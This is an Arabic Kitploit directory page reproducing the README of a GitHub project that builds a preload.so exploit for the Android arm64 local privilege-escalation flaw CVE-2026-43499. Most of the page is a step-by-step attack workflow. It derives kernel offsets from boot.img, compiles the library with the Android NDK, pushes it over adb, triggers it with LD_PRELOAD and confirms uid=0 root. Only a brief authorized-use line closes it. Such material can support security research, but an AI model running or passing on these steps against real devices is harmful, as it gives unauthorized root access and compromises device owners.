Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43499_HW-CLT-AL01 — يولّد إزاحات النواة الخاصة بكل جهاز من ملف boot.img ويُجمّع مكتبة تحميل مسبق (preload) لاستغلال ثغرة تصعيد الامتيازات المحلية CVE-2026-43499 على أندرويد بمعمارية arm64. | Kitploit
أدوات/GitHubGitHub/zychen027/cve-2026-43499_hw-clt-al01
أمان أندرويدتصعيد الامتيازاتالاستغلالأمن الجوالتطوير الحمولاتتحليل البرامج الثابتةاستغلال الملفات الثنائية
GitHubzychen027/cve-2026-43499_hw-clt-al01

CVE-2026-43499_HW-CLT-AL01

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

يولّد إزاحات النواة الخاصة بكل جهاز من ملف boot.img ويُجمّع مكتبة تحميل مسبق (preload) لاستغلال ثغرة تصعيد الامتيازات المحلية CVE-2026-43499 على أندرويد بمعمارية arm64.

عرض المستودع
4منذ 23 أياملم تتم المراجعة بعد

تكييف تصعيد الامتيازات المحلي على Android arm64 لثغرة CVE-2026-43499

English | العربية


هذا مشروع لتكييف تصعيد الامتيازات المحلي على Android arm64 لثغرة CVE-2026-43499.

يقوم المشروع بإنشاء target.h استنادًا إلى boot.img ومعلومات profile الخاصة بالجهاز الهدف، ثم يجمّع ملف preload.so المطابق.

ملاحظة: هذا المشروع إطار عمل تكييف عام ولا يرتبط بطراز معيّن. تعتمد قابلية الاستخدام الفعلية على نجاح generate_target.py في إنشاء target.h ونتائج الاختبار على جهاز حقيقي.


هيكل الدليل

root@kitploit:~
项目目录/
├── boot.img                   # 目标设备同固件 boot 镜像
├── profile.json               # 目标设备 profile
├── detect_offset.py           # 检测 profile 用
├── generate_target.py         # 生成 target.h
├── source/
│   ├── Makefile
│   └── src/
│       └── target.h           # 自动生成
└── source/build/bin/
    └── preload.so             # 编译产物

التبعيات المطلوبة

التبعيات الأساسية

root@kitploit:~
Python 3
LLVM / llvm-objdump
Android NDK
make
adb

البيئة الموصى بها على Windows

يُوصى باستخدام ما يلي على Windows:

root@kitploit:~
MSYS2 UCRT64
Android NDK r29
LLVM Windows x86_64

لتثبيت make داخل MSYS2:

root@kitploit:~
pacman -S make coreutils

تحضير الملفات

ستحتاج إلى تجهيز:

root@kitploit:~
boot.img
profile.json

مثال على ملف profile:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

هذان العنوانان في ملف profile:

root@kitploit:~
p0_phys_offset
p0_kernel_phys_load

يمكنك الحصول عليهما بتشغيل السكربت على هاتف مجذّر (Root) يعمل بنفس البرنامج الثابت لملف boot.img الهدف:

root@kitploit:~
python3 detect_offset.py

ويمكن فعل ذلك أيضًا على Windows:

root@kitploit:~
python detect_offset.py

خطوات الاستخدام

1. الانتقال إلى دليل المشروع

Linux / macOS:

root@kitploit:~
cd PATH/project

مثال على Windows MSYS2:

root@kitploit:~
cd PATH/CVE-2026-43499-Poc-Analysis-main

2. ضبط مسار NDK

مثال على Linux / macOS:

root@kitploit:~
export ANDROID_NDK_HOME=PATH/android-ndk

مثال على Windows MSYS2:

root@kitploit:~
export ANDROID_NDK_HOME=PATH/android-ndk-r29

3. إنشاء target.h

root@kitploit:~
python generate_target.py \
  --boot boot.img \
  --profile profile.json \
  -o source/src/target.h

أو باستخدام CMD:

root@kitploit:~
python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h

إذا ظهرت رسالة تفيد بعدم العثور على llvm-objdump، فحدّد المسار يدويًا:

root@kitploit:~
python generate_target.py \
  --boot boot.img \
  --profile profile.json \
  -o source/src/target.h \
  --llvm-objdump "PATH/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"

أو باستخدام CMD:

root@kitploit:~
python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h --llvm-objdump "PATH/clang+llvm-22.1.8-x86_64-pc-windows-msvc/bin/llvm-objdump.exe"

بعد النجاح سترى مخرجًا مشابهًا لما يلي:

root@kitploit:~
生成成功: .../source/src/target.h
kernel SHA-256: ...
target macros: ...

4. تجميع preload.so

Linux / macOS:

root@kitploit:~
make -C source clean preload

Windows MSYS2:

root@kitploit:~
make -C source clean preload NDK_PREBUILT=windows-x86_64

بعد النجاح سيتم إنشاء:

root@kitploit:~
source/build/bin/preload.so

5. الدفع إلى الجهاز وتشغيله

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
root@kitploit:~
adb shell "chmod 0644 /data/local/tmp/preload.so"
root@kitploit:~
adb shell "LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true"

للتحقق:

root@kitploit:~
adb shell "/data/local/tmp/su -c 'id'"

عند النجاح سترى عادةً:

root@kitploit:~
uid=0(root) gid=0(root)

سير العمل بنقرة واحدة على Windows MSYS2

وفقًا لمثال المسار لديك:

root@kitploit:~
cd PATH/CVE-2026-43499-annibale-main
root@kitploit:~
export ANDROID_NDK_HOME=PATH/android-ndk-r29
root@kitploit:~
python generate_target.py --boot boot.img --profile profile.json -o source/src/target.h
root@kitploit:~
make -C source clean preload NDK_PREBUILT=windows-x86_64

الملف النهائي:

root@kitploit:~
source/build/bin/preload.so

الأسئلة الشائعة

تعذّر العثور على llvm-objdump

ثبّت LLVM، أو استخدم الخيار:

root@kitploit:~
--llvm-objdump "PATH/llvm-objdump"

تعذّر العثور على make

على Windows، ثبّته عبر MSYS2:

root@kitploit:~
pacman -S make coreutils

تعذّر العثور على clang

عادةً ما يكون السبب هو أن مسار NDK لم يُضبط بشكل صحيح.

مثال على Windows MSYS2:

root@kitploit:~
export ANDROID_NDK_HOME=PATH/android-ndk-r29
make -C source clean preload NDK_PREBUILT=windows-x86_64

فشل إنشاء target.h

عادةً ما يعني ذلك أن ملف boot.img الحالي أو تخطيط النواة لم يُكيَّف بنجاح بعد.

ركّز على التحقق من:

root@kitploit:~
boot.img 是否完整
profile 是否正确
llvm-objdump 是否可用
内核是否有 IKCONFIG / kallsyms / BTF

ملاحظات

  • بعد تغيير الجهاز أو النظام أو النواة، أعد إنشاء target.h.
  • لا يُنصح بتعديل target.h يدويًا؛ يجب أن يُنشأ تلقائيًا عبر generate_target.py.
  • لا تستخدم هذا إلا على الأجهزة والبيئات التي تملك إذنًا باستخدامها.
تنزيل الأداة